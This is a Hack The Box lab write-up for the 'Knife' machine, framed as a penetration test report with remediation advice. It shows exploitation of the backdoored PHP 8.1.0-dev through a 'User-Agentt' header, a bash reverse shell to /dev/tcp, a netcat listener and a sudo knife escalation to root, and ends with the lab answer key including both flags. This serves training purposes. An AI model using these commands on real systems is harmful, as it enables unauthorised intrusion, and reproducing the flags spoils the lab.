Background
This box, titled Knife for obvious reasons found out later in this lab, is an easy-rated box that involves a Linux machine running a certain version of PHP that included a backdoor left unnoticed upon release. Exploiting this will let us gain our initial access, and from here, we will use a resource that will let us easily elevate our access to root user.
Executive Summary
This machine has a very blatant vulnerability that most threat actors could immediately identify — a version of PHP that was released with a backdoor.
PHP is a general-purpose scripting language geared towards web development.
We are shown the version of PHP running on this web server when we see the response header, and in plaintext, it reads “PHP/8.1.0-dev.” When we look up this particular version, the first result is for an exploit for this particular version: PHP 8.1.0-dev — ‘User-Agentt’ Remote Code Execution — PHP webapps Exploit (exploit-db.com).
This is an immediate area that needs change. I would recommend updating the version of PHP to a more secure version without this severe vulnerability. This page from the official PHP page provides a download for this update, as well as a changelog detailing the changes. The exploit itself will be detailed in the methodology section of this report.
A second vulnerability I would recommend protecting is the ability of select users to run certain commands, or “binaries.” We escalated our privileges by our ability to run the “knife” binary as sudo.
sudo is a command in Unix and Unix-like operating systems that allows users to run programs or commands with the privileges of another user, typically the superuser or root.
Unless users have a necessity to run certain commands and/or programs, restrict their access. This is called the principle of least privilege.
The principle of least privilege (PoLP) is a security concept and best practice in computer science and cybersecurity. It essentially means that a user, program, or system should have the minimum level of access and permissions necessary to perform their tasks or duties.
This can be implemented in a few ways, including, but not limited to:
- Audit and Assess Permissions:
Identify existing user roles, access levels, and permissions. Determine what each role or user needs to accomplish their tasks.
2. Restrict Access:
Review and limit administrative privileges to essential personnel. Limit user permissions to only what’s required for their roles.
3. Create Segmentation:
Segregate access levels. For example, separate system administrators from standard users and limit each group’s permissions.
4. Regular Reviews and Updates:
Periodically review user permissions and access rights. Update privileges as roles or responsibilities change.
5. Use Role-Based Access Control (RBAC):
Implement RBAC to assign permissions based on job roles rather than individual identities. This makes it easier to manage access control.
6. Implement Strong Authentication:
Use multi-factor authentication to ensure that even users with lower privileges have secure access.
7. Least Privilege for Software:
Configure software and applications to run with minimal necessary privileges.
Now that we have explained what can be fixed, let’s dive into how we figured this out.
Methodology
Enumeration
To begin, we nmapped the target IP.
nmap -sV -sC 10.129.234.189
Nmapping, along with using the -sV flag, will show us what ports are running what services, and the -sV flag will show us the service versions running.
After this, we get the following output:
We see 2 ports, port 22 and port 80.
First, we can determine that port 22, here used for SSH.
SSH stands for Secure Shell. It’s a network protocol that allows secure communication between two devices by encrypting the connection. SSH is commonly used for remote access to systems, allowing users to log into another computer over a network, execute commands, and move files securely.
We also see that it is not configured for anonymous login, which is sometimes configured on machines, leaving a possible point of entry to a system.
So, knowing this, we can check out the port 80 HTTP service. Let’s toss this IP into a browser and see what pulls up.
Interesting, some kind of healthcare site. This site itself doesn’t reveal much, even in developer mode and after viewing the source.
We do, however, have the ability to see the versions and services that are running this web server with our Wappalyzer firefox extension.
We now know the stack used to build this web server.
Let’s check out this IP in dirbuster to see if there are any other pages we could check out.
Inconclusive, we don’t see any other pages to check out.
We can try to capture a response header to uncover more information.
A response header is an HTTP header that can be used in an HTTP response and that doesn’t relate to the content of the message.
To do this, let’s run the following command:
curl -I http://10.129.234.189/index.php
We get this output:
Awesome, we now know the exact version of PHP this server is running — 8.1.0-dev. Let’s look this up to see if there is an exploit for it.
Wow, there sure is. It appears that someone left a backdoor in this particular version.
This github page shows us more info about it. It appears as though someone implanted a backdoor when this version was rolled out, and by sending a “User-Agentt” (sic) header in our GET packet to include “zerodium system” followed by a command in parentheses, the command will be executed as if it were intentionally included in the PHP script.
Exploit
Let’s capture a packet in burp so that we can modify it to send the altered packet we need it to.
For testing purposes, we will pass along “id” with our modified header.
Here is the response we get:
How awesome is that, we achieved RCE. We can see that the server is running as user “james.”
Let’s now try passing a reverse shell command to hit a netcat listener.
We will use the following command to set up our listener.
nc -lvnp 4444
nc: This is the command for netcat, a utility used for reading from and writing to network connections.
-l: It instructs netcat to listen for an incoming connection.
-v: It stands for verbose mode, providing more detailed information about the connection.
-n: This option is to prevent DNS resolution, which means it will not try to resolve hostnames.
-p 4444: This specifies the port number (4444 in this case) to listen on.
We will also, in our Burp repeater, send the following modified “User-Agentt” header:
bash -c 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1'
# replace IP and port with your local machine's address
This time, we are passing a reverse shell to hit our local device and selected port. Let’s check our listener.
Awesome, we now have a shell as user “james.”
From here, we can also get the user flag.
Privilege Escalation
We have a shell as a user, but to really penetrate this machine, we want to get access as the root user.
To start our second enumeration, let’s run “sudo -l” to see what this user can run as superuser.
-l, — list If no command is specified, list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host. A longer list format is used if this option is specified multiple times and the security policy supports a verbose output format.
Interesting, user james can run /usr/bin/knife.
/usr/bin/knife typically refers to the command-line tool ‘Knife’ used in the context of Chef, an automation platform.
Chef is used for configuration management, and Knife is a command-line tool that interacts with the Chef server. It allows users to manage Chef nodes, cookbooks, recipes, and more.
The /usr/bin directory is a common location for storing executable binaries on Unix-based systems, including Linux. When you refer to /usr/bin/knife, it indicates the location of the Knife executable binary on the system.
Since we know that this user can run a certain binary as superuser, let’s check out a very useful website: GTFOBins.
This website has a directory of commands and tools that escalate privileges to root by simply having access to a binary. Let’s find the “knife” page.
knife | GTFOBins shows what we can do.
Let’s try running that command:
sudo knife exec -E 'exec "/bin/sh"'
We are now the root user.
From here, we can spawn a TTY shell with the following command to help us find the root flag.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Now we can navigate a bit and find the flag:
Looking at the knife binary command we ran a bit further, let’s break it down.
sudo: It’s a command that allows users to execute commands with elevated privileges.
knife: The command-line tool for interacting with Chef, used for various administrative tasks.
exec -E ‘exec “/bin/sh”’: This portion seems to be using the -E flag, which typically denotes the inline Ruby code to be executed by Knife. The specific Ruby code provided, exec “/bin/sh”, attempts to execute a shell directly by calling /bin/sh.
Summary
This was a fast box. After discovering the main exploit here with the PHP version running, we were able to simply change one line to get RCE, and then enter 2 commands to root ourselves. Again, as stated in the execute summary, this can be secured by updating the version of PHP running to a secure version without a backdoor.
HacktheBox Answers
QUESTION 1: How many TCP ports are open on Knife?
2
QUESTION 2: What version of PHP is running on the webserver?
8.1.0-dev
QUESTION 3: What HTTP request header can be added to get code execution in this version of PHP?
User-Agentt
QUESTION 4: What user is the web server running as?
james
USER FLAG: Submit the flag located in the james user’s home directory.
48c950967fa8b9041d97fb94f473b923
QUESTION 5: What is the full path to the binary on this machine that james can run as root?
/usr/bin/knife
ROOT FLAG: Submit the flag located in root’s home directory.
8dac6eb88921f843631dcdd0850cd27d
Keywords
Ethical hacking case study, Penetration testing findings, HTB box analysis, Vulnerability assessment report, HTB answers, Cybersecurity testing insights, Hack The Box report, Penetration tester’s analysis, HTB challenge resolution, Ethical hacking techniques, Security assessment report, Hacker’s perspective on HTB, Network penetration testing, Exploitation and remediation, Hack The Box success story, Ethical hacking best practices, Vulnerability identification, Real-world hacking scenario, Penetration testing case study, Practical hacking lessons, htb knife